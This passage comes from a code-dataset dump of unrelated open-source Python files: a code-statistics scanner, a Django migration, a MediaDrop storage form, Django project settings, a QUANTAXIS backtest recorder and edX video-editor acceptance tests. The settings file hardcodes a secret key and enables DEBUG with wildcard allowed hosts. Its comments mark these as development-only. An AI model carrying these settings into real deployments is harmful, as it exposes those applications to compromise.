_JAVA_CLASS_PAT, _PY_CLASS_PAT] _TESTNAME_PATS = [_CPP_TESTNAME_PAT, _JAVA_TESTNAME_PAT, _PY_TESTNAME_PAT] def getFileTypeIndex(path): path = path.lower() if path.endswith('.cpp') or path.endswith('.h'): return 0 elif path.endswith('.java'): return 1 elif path.endswith('.py'): return 2 return -1 def getClassPatForPath(path): i = getFileTypeIndex(path) if i != -1: return _CLASS_PATS[i] def getTestnamePatForPath(path): i = getFileTypeIndex(path) if i != -1: return _TESTNAME_PATS[i] def analyzeFile(fpath, stats): fpath = os.path.abspath(fpath) rel = stats.getRelativePath(fpath) #print('analyzing %s' % rel) txt = read_file(fpath) byteCount = len(txt) stats.addStat(fpath, 'byte count, impl + test', byteCount) lineCount = codescan.getLineNumForOffset(txt, byteCount) stats.addStat(fpath, 'line count, impl + test', lineCount) isTest = bool(_TEST_FILE_PAT.search(fpath)) codeType = 'impl' if isTest: codeType = 'test' stats.addStat(fpath, 'byte count, ' + codeType, byteCount) stats.addStat(fpath, 'line count, ' + codeType, lineCount) # See if we know how to do any further analysis on this file. pat = getClassPatForPath(fpath) if pat: if isTest: pat = getTestnamePatForPath(fpath) if pat: stats.addStat(fpath, 'unit test count', len(pat.findall(txt))) else: stats.addStat(fpath, 'class count', len(pat.findall(txt))) def statPathIsFile(p): i = p.rfind('.') if i > -1: return p[i+1:] in ['cpp','h','java','py'] return False def statPathIsComponent(p): return p == '' or (p.endswith('/') and p.find('/') == len(p) - 1) _FLOAT_TYPE = type(0.1) def getReportLine(key, number, showKB = False, formatSpecifier='%02f'): numtxt = number ntype = type(number) if ntype == _FLOAT_TYPE: numtxt = formatSpecifier % number if numtxt.endswith('00'): numtxt = numtxt[0:-3] else: numtxt = str(number) line = '%s = %s' % (key, numtxt) if showKB: line += ' (%0.0f KB)' % (number / 1024.0) return line def getAggregateStats(dict, key): values = dict.get(getValuesKeyName(key)) avg = mean(values) stdev = stddev(values) return avg, stdev def describeTestRatio(ratio, multiplier = 1.0): if ratio < 0.085 * multiplier: lbl = 'POOR COVERAGE' elif ratio < 0.20 * multiplier: lbl = 'fair coverage' elif ratio < 0.5 * multiplier: lbl = 'good coverage' else: lbl = 'excellent coverage' return '%0.2f (%s)' % (ratio, lbl) def generateReport(stats): #print(stats.statsByPath) report = '' components = [p for p in stats.statsByPath.keys() if statPathIsComponent(p)] files = [p for p in stats.statsByPath.keys() if statPathIsFile(p)] components.sort() files.sort() uberDict = stats.statsByPath[''] avg, stdev = getAggregateStats(uberDict, 'byte count, impl') tooBigs = {'': max(avg + 2.5 * stdev, 20000)} avg, stdev = getAggregateStats(uberDict, 'line count, impl') tooLongs = {'': max(avg + 2.5 * stdev, 1000)} for ext in stats.statsByExtension.keys(): dict = stats.statsByExtension[ext] avg, stdev = getAggregateStats(dict, 'byte count, impl') tooBigs[ext] = avg + 2.5 * stdev avg, stdev = getAggregateStats(dict, 'line count, impl') tooLongs[ext] = max(avg + 2.5 * stdev, 1000) for path in components: desc = path if desc == '': desc = 'entire folder tree' report += '\nStats for %s' % desc dict = stats.statsByPath[path] keys = [k for k in dict.keys() if not isValuesKeyName(k)] keys.sort() for key in keys: showKB = key.startswith('byte') report += '\n ' + getReportLine(key, dict[key], showKB) if showKB or key.startswith('line'): values = dict[getValuesKeyName(key)] avg = mean(values) report += '; ' + getReportLine('mean', avg, showKB, formatSpecifier='%0.0f') report += '; ' + getReportLine('std dev', stddev(values), False, formatSpecifier='%0.1f') classCount = dict.get('class count', 0) unitTestCount = dict.get('unit test count', 0) if unitTestCount: implLineCount = dict.get('line count, impl', 0) testLineCount = dict.get('line count, test', 0) if implLineCount: ratio = describeTestRatio(testLineCount / float(implLineCount)) report += '\n ' + getReportLine('test lines per impl line', ratio) implByteCount = dict.get('byte count, impl', 0) testByteCount = dict.get('byte count, test', 0) if implByteCount: ratio = describeTestRatio(testByteCount / float(implByteCount)) report += '\n ' + getReportLine('test bytes per impl byte', ratio) if classCount: ratio = describeTestRatio(float(unitTestCount) / classCount, 2.5) else: ratio = '(undefined; no classes)' else: ratio = 'NO UNIT TESTS!' report += '\n ' + getReportLine('tests per class', ratio) if path: myFiles = [f for f in files if f.startswith(path)] #testFiles = [f for f in myFiles if _TEST_FILE_PAT.search(f)] #implFiles = [f for f in myFiles if not _TEST_FILE_PAT.search(f)] tooComplex = [] for implF in myFiles: ignored, ext = os.path.splitext(implF) size = stats.statsByPath[implF].get('byte count, impl') length = stats.statsByPath[implF].get('line count, impl') if size > tooBigs[''] or size > tooBigs[ext] or length > tooLongs[''] or length > tooLongs[ext]: tooComplex.append((implF, size, length)) if tooComplex: # Java doesn't support partial classes, so splitting classes into multiple # files isn't always practical. In C++ and python, however, there are good # ways to split into smaller files. if tooComplex[0][0].endswith('.java'): comment = 'refactor suggested' else: comment = 'REFACTOR NEEDED' report += '\n unusually complex files (%s):' % comment for tc in tooComplex: report += '\n %s (%0.0f KB, %d lines)' % (tc[0], tc[1] / 1024.0, tc[2]) report += '\n' return report def sum(numbers): n = 0 for x in numbers: n += x return n def mean(numbers): return sum(numbers) / float(len(numbers)) def variance(numbers): avg = mean(numbers) diffsFromMean = [n - avg for n in numbers] squaredDfm = [n * n for n in diffsFromMean] variance = sum(squaredDfm) / len(numbers) return variance def stddev(numbers): # This is a *population* stddev, not a sample stddev. # The difference is that we assume we have all possible # values, not just a representative sample. return math.sqrt(variance(numbers)) class StatsRecurser: def __init__(self, stats): self.stats = stats def select(self, folder, dirs): self.stats.addStat(folder, "scanned subdir count", len(dirs)) return dirs class StatsVisitor: def __init__(self, stats): self.stats = stats def visit(self, folder, item, relativePath): analyzeFile(folder + item, self.stats) self.stats.addStat(folder, "scanned file count", 1) def analyze(path, prebuilt, options): if not os.path.isdir(path): sys.stderr.write('%s is not a valid folder.\n' % path) return 1 path = norm_folder(path) stats = StatsHolder(path) print('\nCompiling stats for %s...' % metadata.get_friendly_name_for_path(path)) visitor = StatsVisitor(stats) recurser = StatsRecurser(stats) visitedFiles, visitedFolders = metadata.visit(path, visitor, recurser, excludePrograms=True)#, debug=True) report = generateReport(stats) print(report) if xmail.hasDest(options): xmail.sendmail(report, subject='code stats for %s' % metadata.get_friendly_name_for_path(path), sender='Code Stat Scanner <code.scan@example.com>', options=options) if __name__ == '__main__': options, args = parser.parse_args() prebuilt = [] if args: folder = args[0] else: folder = sandbox.current.get_code_root() exitCode = analyze(folder, prebuilt, options) sys.exit(exitCode)
perfectsearch/sandman
code/buildscripts/codescan/get_code_stats.py
Python
mit
12,831
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ ('reformedacademy', '0006_auto_20140915_0251'), ] operations = [ migrations.CreateModel( name='BetaToken', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('token', models.CharField(max_length=5)), ('redeemed', models.DateTimeField(blank=True)), ('invited_by', models.ForeignKey(related_name=b'invited_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)), ('redeemed_by', models.ForeignKey(related_name=b'redeemed_token', blank=True, to=settings.AUTH_USER_MODEL, null=True)), ], options={ }, bases=(models.Model,), ), ]
reformedforum/reformedacademy
reformedacademy/migrations/0007_betatoken.py
Python
gpl-3.0
979
# This file is a part of MediaDrop (http://www.mediadrop.net), # Copyright 2009-2014 MediaDrop contributors # For the exact contribution history, see the git revision log. # The source code contained in this file is licensed under the GPLv3 or # (at your option) any later version. # See LICENSE.txt in the main project directory, for more information. from formencode import Invalid from formencode.validators import FancyValidator from tw.api import JSSource from tw.forms import FormFieldRepeater from mediadrop.forms import ListFieldSet, TextField from mediadrop.forms.admin.storage import StorageForm from mediadrop.lib.i18n import N_, _ from mediadrop.plugin import events # Sure this could be abstracted into something more reusable. # But at this point there's no need. Refactor later if needed. class TranslateableRTMPServerJSSource(JSSource): def render(self, *args, **kwargs): src = JSSource.render(self, *args, **kwargs) return src % {'add_url': _('Add another URL')} rtmp_server_js = TranslateableRTMPServerJSSource(""" window.addEvent('domready', function(){ var fields = $('rtmp').getElement('li'); var addButton = new Element('span', { 'class': 'add-another clickable', 'text': '%(add_url)s' }); addButton.inject(fields, 'bottom').addEvent('click', function(){ var lastInput = addButton.getPrevious(); var fullname = lastInput.get('name'); var sepindex = fullname.indexOf('-') + 1; var name = fullname.substr(0, sepindex); var nextNum = fullname.substr(sepindex).toInt() + 1; var el = new Element('input', { 'type': 'text', 'name': name + nextNum, 'class': 'textfield repeatedtextfield rtmp-server-uri' }); el.inject(lastInput, 'after').focus(); }); }); """, location='headbottom') class RTMPURLValidator(FancyValidator): def _to_python(self, value, state=None): if value.startswith('rtmp://'): return value.rstrip('/') raise Invalid(_('RTMP server URLs must begin with rtmp://'), value, state) class RemoteURLStorageForm(StorageForm): event = events.Admin.Storage.RemoteURLStorageForm fields = StorageForm.fields + [ ListFieldSet('rtmp', legend=N_('RTMP Servers:'), suppress_label=True, children=[ # FIXME: Display errors from the RTMPURLValidator FormFieldRepeater('known_servers', widget=TextField( css_classes=['textfield rtmp-server-uri'], validator=RTMPURLValidator(), ), suppress_label=True, repetitions=1, ), ], ) ] + StorageForm.buttons javascript = [rtmp_server_js] def display(self, value, engine, **kwargs): """Display the form with default values from the given StorageEngine. If the value dict is not fully populated, populate any missing entries with the values from the given StorageEngine's :attr:`_data <mediadrop.lib.storage.StorageEngine._data>` dict. :param value: A (sparse) dict of values to populate the form with. :type value: dict :param engine: An instance of the storage engine implementation. :type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass """ rtmp = value.setdefault('rtmp', {}) rtmp.setdefault('known_servers', engine._data.get('rtmp_server_uris', ())) return StorageForm.display(self, value, engine, **kwargs) def save_engine_params(self, engine, **kwargs): """Map validated field values to engine data. Since form widgets may be nested or named differently than the keys in the :attr:`mediadrop.lib.storage.StorageEngine._data` dict, it is necessary to manually map field values to the data dictionary. :type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass :param engine: An instance of the storage engine implementation. :param \*\*kwargs: Validated and filtered form values. :raises formencode.Invalid: If some post-validation error is detected in the user input. This will trigger the same error handling behaviour as with the @validate decorator. """ StorageForm.save_engine_params(self, engine, **kwargs) rtmp = kwargs.get('rtmp', {}) rtmp_servers = rtmp.get('known_servers', ()) engine._data['rtmp_server_uris'] = [x for x in rtmp_servers if x]
kgao/MediaDrop
mediadrop/forms/admin/storage/remoteurls.py
Python
gpl-3.0
4,730
""" Django settings for dron project. Generated by 'django-admin startproject' using Django 1.11.1. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '^+futs*@p&z(@7n1$aj#2#0@5w^b8pwurw(6p%w164_#l1qwpp' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True # Used to determine if we are using mock.py data or real dronekit data MODE = "ANDROID" # MOCK, ANDROID, DRONEKIT ALLOWED_HOSTS = [u'*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'maps.apps.MapsConfig', 'droniada.apps.DroniadaConfig', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'dron.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'dron.wsgi.application' # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Europe/Warsaw' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = '/static/'
bladekp/DroniadaDjangoDronekitAPP
app/dron/settings.py
Python
mit
3,284
#Encoding:utf-8 from QUANTAXIS.QAUtil import QA_util_log_info,QA_Setting import datetime,time """ 标准化输出结果,并且给QAAnalysis喂食QAQ 首先接受QASignal打包出来的标准协议 """ def QA_backtest_standard_record_market(message,client): #client=QA_backtest_get_client(QA_Backtest) coll=client.quantaxis.market_history """ bid':{ 'price':str(bid['price']), 'code':str(bid['code']), 'amount':str(bid['amount']), 'time':str(bid['time']), 'towards':str(bid['towards']) }, market:{ 'open':item['open'], 'high':item['high'], 'low':item['low'], 'close':item['close'], 'volume':item['volume'], 'code':item['code']} """ coll.insert({ 'user':message['header']['session']['user'], 'strategy_name':message['header']['session']['strategy'], 'time':datetime.datetime.now(), 'date_stamp':str(datetime.datetime.now().timestamp()), 'bid':message['body']['bid'], 'market':message['body']['market'] }) def QA_backtest_standard_record_account(message,client): coll=client.quantaxis.market_history coll.insert({ 'user':message['header']['session']['user'], 'strategy_name':message['header']['session']['strategy'], 'time':datetime.datetime.now(), 'date_stamp':str(datetime.datetime.now().timestamp()), 'bid_date':message['body']['bid']['time'], 'bid':message['body']['bid'], 'market':message['body']['market'], 'account':message['body']['account'], 'cookie':message['header']['coookie'] }) """ 'header':{ 'source':'account', 'cookie':self.account_cookie, 'session':{ 'user':update_message['user'], 'strategy':update_message['strategy'] } }, 'body':{ 'account':{ 'init_assest':self.assets, 'portfolio':self.portfolio, 'history':self.history_trade, 'assest_now':self.assets, 'assest_history':self.total_assest, 'assest_free':self.assets_free, 'assest_fix':self.assets_market_hold_value, 'profit':self.portfit, 'cur_profit':self.cur_profit }, 'bid':update_message['bid'], 'market':update_message['market'], 'time':datetime.datetime.now(), 'date_stamp':str(datetime.datetime.now().timestamp()) """
lijiabogithub/QUANTAXIS
QUANTAXIS/QABacktest/QABacktest_standard.py
Python
mit
2,816
# -*- coding: utf-8 -*- """ Acceptance tests for CMS Video Editor. """ from nose.plugins.attrib import attr from .test_studio_video_module import CMSVideoBaseTest @attr('shard_6') class VideoEditorTest(CMSVideoBaseTest): """ CMS Video Editor Test Class """ def setUp(self): super(VideoEditorTest, self).setUp() def _create_video_component(self, subtitles=False): """ Create a video component and navigate to unit page Arguments: subtitles (bool): Upload subtitles or not """ if subtitles: self.assets.append('subs__Szu8hVDvgc.srt.sjson') self.navigate_to_course_unit() def test_default_settings(self): """ Scenario: User can view Video metadata Given I have created a Video component And I edit the component Then I see the correct video settings and default values """ self._create_video_component() self.edit_component() self.assertTrue(self.video.verify_settings()) def test_modify_video_display_name(self): """ Scenario: User can modify Video display name Given I have created a Video component And I edit the component And I open tab "Advanced" Then I can modify video display name And my video display name change is persisted on save """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.set_field_value('Component Display Name', 'Transformers') self.save_unit_settings() self.edit_component() self.open_advanced_tab() self.assertTrue(self.video.verify_field_value('Component Display Name', 'Transformers')) def test_hidden_captions(self): """ Scenario: Captions are hidden when "transcript display" is false Given I have created a Video component with subtitles And I have set "transcript display" to False Then when I view the video it does not show the captions """ self._create_video_component(subtitles=True) # Prevent cookies from overriding course settings self.browser.delete_cookie('hide_captions') self.edit_component() self.open_advanced_tab() self.video.set_field_value('Show Transcript', 'False', 'select') self.save_unit_settings() self.assertFalse(self.video.is_captions_visible()) def test_shown_captions(self): """ Scenario: Captions are shown when "transcript display" is true Given I have created a Video component with subtitles And I have set "transcript display" to True Then when I view the video it does show the captions """ self._create_video_component(subtitles=True) # Prevent cookies from overriding course settings self.browser.delete_cookie('hide_captions') self.edit_component() self.open_advanced_tab() self.video.set_field_value('Show Transcript', 'True', 'select') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) def test_translations_uploading(self): """ Scenario: Translations uploading works correctly Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "chinese_transcripts.srt" for "zh" language code And I save changes Then when I view the video it does show the captions And I see "好 各位同学" text in the captions And I edit the component And I open tab "Advanced" And I see translations for "zh" And I upload transcript file "uk_transcripts.srt" for "uk" language code And I save changes Then when I view the video it does show the captions And I see "好 各位同学" text in the captions And video language menu has "uk, zh" translations """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('chinese_transcripts.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "好 各位同学".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh']) self.video.upload_translation('uk_transcripts.srt', 'uk') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) self.assertIn(unicode_text, self.video.captions_text) self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk']) def test_upload_large_transcript(self): """ Scenario: User can upload transcript file with > 1mb size Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "1mb_transcripts.srt" for "uk" language code And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('1mb_transcripts.srt', 'uk') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_lines()) def test_translations_download_works_w_saving(self): """ Scenario: Translations downloading works correctly w/ preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |zh |chinese_transcripts.srt| And I save changes And I edit the component And I open tab "Advanced" And I see translations for "uk, zh" And video language menu has "uk, zh" translations Then I can download transcript for "zh" language code, that contains text "好 各位同学" And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас." """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'zh') self.save_unit_settings() self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh', 'uk']) self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk']) zh_unicode_text = "好 各位同学".decode('utf-8') self.assertTrue(self.video.download_translation('zh', zh_unicode_text)) uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertTrue(self.video.download_translation('uk', uk_unicode_text)) def test_translations_download_works_wo_saving(self): """ Scenario: Translations downloading works correctly w/o preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |zh |chinese_transcripts.srt| Then I can download transcript for "zh" language code, that contains text "好 各位同学" And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас." """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'zh') zh_unicode_text = "好 各位同学".decode('utf-8') self.assertTrue(self.video.download_translation('zh', zh_unicode_text)) uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertTrue(self.video.download_translation('uk', uk_unicode_text)) def test_translations_remove_works_w_saving(self): """ Scenario: Translations removing works correctly w/ preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |zh |chinese_transcripts.srt| And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions And video language menu has "uk, zh" translations And I edit the component And I open tab "Advanced" And I see translations for "uk, zh" Then I remove translation for "uk" language code And I save changes Then when I view the video it does show the captions And I see "好 各位同学" text in the captions And I edit the component And I open tab "Advanced" And I see translations for "zh" Then I remove translation for "zh" language code And I save changes Then when I view the video it does not show the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk']) self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh', 'uk']) self.video.remove_translation('uk') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "好 各位同学".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh']) self.video.remove_translation('zh') self.save_unit_settings() self.assertFalse(self.video.is_captions_visible()) def test_translations_remove_works_wo_saving(self): """ Scenario: Translations removing works correctly w/o preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "uk_transcripts.srt" for "uk" language code And I see translations for "uk" Then I remove translation for "uk" language code And I save changes Then when I view the video it does not show the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.assertEqual(self.video.translations(), ['uk']) self.video.remove_translation('uk') self.save_unit_settings() self.assertFalse(self.video.is_captions_visible()) def test_translations_clearing_works_w_saving(self): """ Scenario: Translations clearing works correctly w/ preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |zh |chinese_transcripts.srt| And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions And video language menu has "uk, zh" translations And I edit the component And I open tab "Advanced" And I see translations for "uk, zh" And I click button "Clear" And I save changes Then when I view the video it does not show the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk']) self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh', 'uk']) self.video.click_button('translations_clear') self.save_unit_settings() self.assertFalse(self.video.is_captions_visible()) def test_translations_clearing_works_wo_saving(self): """ Scenario: Translations clearing works correctly w/o preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |zh |chinese_transcripts.srt| And I click button "Clear" And I save changes Then when I view the video it does not show the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'zh') self.video.click_button('translations_clear') self.save_unit_settings() self.assertFalse(self.video.is_captions_visible()) def test_cannot_upload_sjson_translation(self): """ Scenario: User cannot upload translations in sjson format Given I have created a Video component And I edit the component And I open tab "Advanced" And I click button "Add" And I choose "uk" language code And I try to upload transcript file "subs__Szu8hVDvgc.srt.sjson" Then I see validation error "Only SRT files can be uploaded. Please select a file ending in .srt to upload." """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.click_button('translation_add') self.video.select_translation_language('uk') self.video.upload_asset('subs__Szu8hVDvgc.srt.sjson', asset_type='transcript') error_msg = 'Only SRT files can be uploaded. Please select a file ending in .srt to upload.' self.assertEqual(self.video.upload_status_message, error_msg) def test_replace_translation_w_save(self): """ Scenario: User can easy replace the translation by another one w/ preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "chinese_transcripts.srt" for "zh" language code And I save changes Then when I view the video it does show the captions And I see "好 各位同学" text in the captions And I edit the component And I open tab "Advanced" And I see translations for "zh" And I replace transcript file for "zh" language code by "uk_transcripts.srt" And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('chinese_transcripts.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "好 各位同学".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.edit_component() self.open_advanced_tab() self.assertEqual(self.video.translations(), ['zh']) self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) def test_replace_translation_wo_save(self): """ Scenario: User can easy replace the translation by another one w/o preliminary saving Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "chinese_transcripts.srt" for "zh" language code And I see translations for "zh" And I replace transcript file for "zh" language code by "uk_transcripts.srt" And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('chinese_transcripts.srt', 'zh') self.assertEqual(self.video.translations(), ['zh']) self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) def test_translation_upload_remove_upload(self): """ Scenario: Upload "zh" file "A" -> Remove "zh" -> Upload "zh" file "B" Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "chinese_transcripts.srt" for "zh" language code And I see translations for "zh" Then I remove translation for "zh" language code And I upload transcript file "uk_transcripts.srt" for "zh" language code And I save changes Then when I view the video it does show the captions And I see "Привіт, edX вітає вас." text in the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('chinese_transcripts.srt', 'zh') self.assertEqual(self.video.translations(), ['zh']) self.video.remove_translation('zh') self.video.upload_translation('uk_transcripts.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "Привіт, edX вітає вас.".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) def test_select_language_twice(self): """ Scenario: User cannot select the same language twice Given I have created a Video component And I edit the component And I open tab "Advanced" And I click button "Add" And I choose "zh" language code And I click button "Add" Then I cannot choose "zh" language code """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.click_button('translation_add') self.video.select_translation_language('zh') self.video.click_button('translation_add') self.video.select_translation_language('zh') self.assertEqual(self.video.translations(), [u'zh', u'']) def test_table_of_contents(self): """ Scenario: User can see Abkhazian (ab) language option at the first position Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript files: |lang_code|filename | |uk |uk_transcripts.srt | |table |chinese_transcripts.srt| And I save changes Then when I view the video it does show the captions And I see "好 各位同学" text in the captions And video language menu has "table, uk" translations And I see video language with code "table" at position "0" """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('uk_transcripts.srt', 'uk') self.video.upload_translation('chinese_transcripts.srt', 'ab') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "好 各位同学".decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) self.assertEqual(self.video.caption_languages.keys(), [u'ab', u'uk']) self.assertEqual(self.video.caption_languages.keys()[0], 'ab') def test_upload_transcript_with_BOM(self): """ Scenario: User can upload transcript file with BOM(Byte Order Mark) in it. Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "chinese_transcripts_with_BOM.srt" for "zh" language code And I save changes Then when I view the video it does show the captions And I see "莎拉·佩林 (Sarah Palin)" text in the captions """ self._create_video_component() self.edit_component() self.open_advanced_tab() self.video.upload_translation('chinese_transcripts_with_BOM.srt', 'zh') self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) unicode_text = "莎拉·佩林 (Sarah Palin)".decode('utf-8') self.assertIn(unicode_text, self.video.captions_lines()) def test_simplified_and_traditional_chinese_transcripts_uploading(self): """ Scenario: Translations uploading works correctly Given I have created a Video component And I edit the component And I open tab "Advanced" And I upload transcript file "simplified_chinese.srt" for "zh_HANS" language code And I save changes Then when I view the video it does show the captions And I see "在线学习是革" text in the captions And I edit the component And I open tab "Advanced" And I upload transcript file "traditional_chinese.srt" for "zh_HANT" language code And I save changes Then when I view the video it does show the captions And I see "在線學習是革" text in the captions And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese' and 'Traditional Chinese' respectively """ self._create_video_component() langs_info = [ ('zh_HANS', 'simplified_chinese.srt', '在线学习是革'), ('zh_HANT', 'traditional_chinese.srt', '在線學習是革') ] for lang_code, lang_file, lang_text in langs_info: self.edit_component() self.open_advanced_tab() self.video.upload_translation(lang_file, lang_code) self.save_unit_settings() self.assertTrue(self.video.is_captions_visible()) # If there is only one language then there will be no subtitle/captions menu if lang_code == 'zh_HANT': self.video.select_language(lang_code) unicode_text = lang_text.decode('utf-8') self.assertIn(unicode_text, self.video.captions_text) 